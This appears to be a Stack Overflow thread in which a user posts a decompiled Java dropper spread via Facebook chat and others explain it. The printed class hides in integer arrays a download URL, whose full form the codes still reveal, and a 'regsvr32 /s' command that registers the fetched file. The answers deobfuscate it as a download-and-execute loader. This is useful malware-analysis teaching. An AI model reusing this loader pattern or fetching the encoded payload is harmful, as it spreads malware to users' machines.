Code inside this undetectable malware

Question

I have got this message two times in facebook quoting " lol abc.rar" , the abc.rar file has an executable jar file which once clicked tries to connect to facebook and enters the same message to another chat randomly. I decompiled it using jd gui 0.36 and found a class czjffdqozxffyhrq inside this malware/virus,there is also a manifest file inside it.I tried virus total but it gives no results. This is surely a threat as it has come to me from two facebook friends of mine, who are unrelated to each other ,so it's spreading very fast virus total result: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/

Now the code of class:-package com.cakes;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq
{
  public static String mrdbdgwortilmglt()
  {
    int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };

    StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
    for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
      cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);
    }
    return cfmbxqxdanzahnu.toString();
  }

  public static String olzezeaokmr()
  {
    int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };

    StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
    for (int i = 0; i < wwlytwss.length; i++) {
      uurwhymtb.append((char)wwlytwss[i]);
    }
    return uurwhymtb.toString();
  }

  public static String wxujpwlzjfvvc()
  {
    int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };

    StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
    for (int i = 0; i < krihniioygdowfq.length; i++) {
      dmpxcpok.append((char)krihniioygdowfq[i]);
    }
    return dmpxcpok.toString();
  }

  public static String uwqeeyesndtlyfye()
  {
    int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };

    StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
    for (int i = 0; i < wwlytwsspath.length; i++) {
      eiljiba.append((char)wwlytwsspath[i]);
    }
    return eiljiba.toString();
  }

  public static void bnyikewbdrqhetgb()
    throws IOException
  {
    int m = 1;
    while (m < 7)
    {
      Runtime.getRuntime().exec(uwqeeyesndtlyfye());
      m++;
    }
  }

  public static void main(String[] args)
    throws Exception
  {
    new File(wxujpwlzjfvvc()).mkdir();
    File u = new File(olzezeaokmr());
    if (u.exists())
    {
      bnyikewbdrqhetgb();
    }
    else
    {
      String pdisodea = mrdbdgwortilmglt();
      String lwpztudm = olzezeaokmr();
      lslmzhpvu(pdisodea, lwpztudm);
    }
  }

  public static void lslmzhpvu(String rklnt, String nenyy)
    throws IOException
  {
    URL hsnmxltpgt = new URL(rklnt);
    InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
    OutputStream uxvkcl = new FileOutputStream(nenyy);
    byte[] b = new byte[432101];
    int length;
    while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)
    {
      int length;
      uxvkcl.write(b, 0, length);
    }
    mlzfltpyqeoqdahzvel.close();
    uxvkcl.close();
    bnyikewbdrqhetgb();
  }
}

Can someone please explain how this is working and why is it still not detectable?

Obfuscated code like this makes my eyes bleed. Code with reasonable names attached to variables and methods is hard enough to read as-is! What analysis have you already done on this to indicate what it does? Save us some time and tell us everything you know about "how this is working". — FrobberOfBits, Apr 09 '14 at 18:07
the code seems to execute some commands via `Runtime.getRuntime().exec(..` and those commands are obfuscated as int arrays — donfuxx, Apr 09 '14 at 18:08
After I click on this jar file ,a process randomly starts in between while I am working on my computer and tries to communicate with facebook ,at that time my antivirus stops the process,but on running a full virus scan on abc.rar ,it detects nothing !! — swapedoc, Apr 09 '14 at 18:09

Dancrumb · Answer 1 · 2014-04-10T14:42:05.110

This is a pretty trivial attempt at obfuscation.

The methods:

mrdbdgwortilmglt
olzezeaokmr
wxujpwlzjfvvc
uwqeeyesndtlyfye

are just Strings hidden as arrays of ints.

bnyikewbdrqhetgb is clearly naughty, since it's calling Runtime.getRuntime().exec... that should always be a warning sign in code.

lslmzhpvu is accessing a URL... also naughty.

By "naughty", here, I mean it's code that reaching outside of itself and so, potentially, doing harm elsewhere. In code that you've downloaded, that should be a major warning sign, unless you know that the code should be doing stuff with URLs or executing external programs.

Why doesn't an antivirus package catch it?

It is catching it. It detects the unauthorized attempt to access a URL and warns you.

Deobfuscated (a little

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq
{
  public static String getDropBoxURL() {
    // This URL has been bowdlerized to protect the dangerously curious
    return "http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/****.dat?dl=1";
  }

  public static String getTempFile() {
    return "C:\\temp\\qvsfccjm.gtj";
  }

  public static String getTempDir() {
    return "C:\\temp\\";
  }

  public static String getRegisterCommand() {
    return "regsvr32 /s C:\\temp\\qvsfccjm.gtj";
  }

  public static void registerControlSixTimes() throws IOException {
    int m = 1;
    while (m < 7)
    {
      Runtime.getRuntime().exec(getRegisterCommand());
      m++;
    }
  }

  public static void main(String[] args) throws Exception {
    new File(getTempDir()).mkdir();
    File u = new File(getTempFile());
    if (u.exists())
    {
      registerControlSixTimes();
    }
    else
    {
      String dbURL = getDropBoxURL();
      String tempFileName = getTempFile();
      downloadFromURLToFile(dbURL, tempFileName);
    }
  }

  public static void downloadFromURLToFile(String urlString, String fileName) throws IOException {
    URL url = new URL(urlString);
    InputStream in = url.openStream();
    OutputStream out = new FileOutputStream(fileName);
    byte[] b = new byte[432101];
    int length;
    while ((length = in.read(b)) != -1) {
      int length;
      out.write(b, 0, length);
    }
    in.close();
    out.close();
    registerControlSixTimes();
  }
}

score 3 · Accepted Answer · answered Apr 09 '14 at 18:21

3

Basically it downloads a file from;

http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1

(obfuscated link, don't want anyone downloading it by mistake)

...to c:\temp and registers it in the system using;

regsvr32 /s <filename>

The real evil is probably in the downloaded file (which I'm not going to download :) )

answered Apr 09 '14 at 18:21

Joachim Isaksson

176,943
25
281
294

1

but how did you find it? – swapedoc Apr 09 '14 at 18:22
1

well, each int in the arrays represents a char. @swapedoc – donfuxx Apr 09 '14 at 18:25
1

@swapedoc `tdclrmdqriktvlkvmy` contains the ascii codes for the characters in `http://dl.dropboxusercontent...` and `wwlytwsspath` contains the ascii codes for the `regsvr32` command. The other two are just paths where the file is stored. There really is no obfuscation to speak of, it's just stored in ascii integers. – Joachim Isaksson Apr 09 '14 at 18:25

Code inside this undetectable malware

2 Answers2

Why doesn't an antivirus package catch it?

Deobfuscated (a little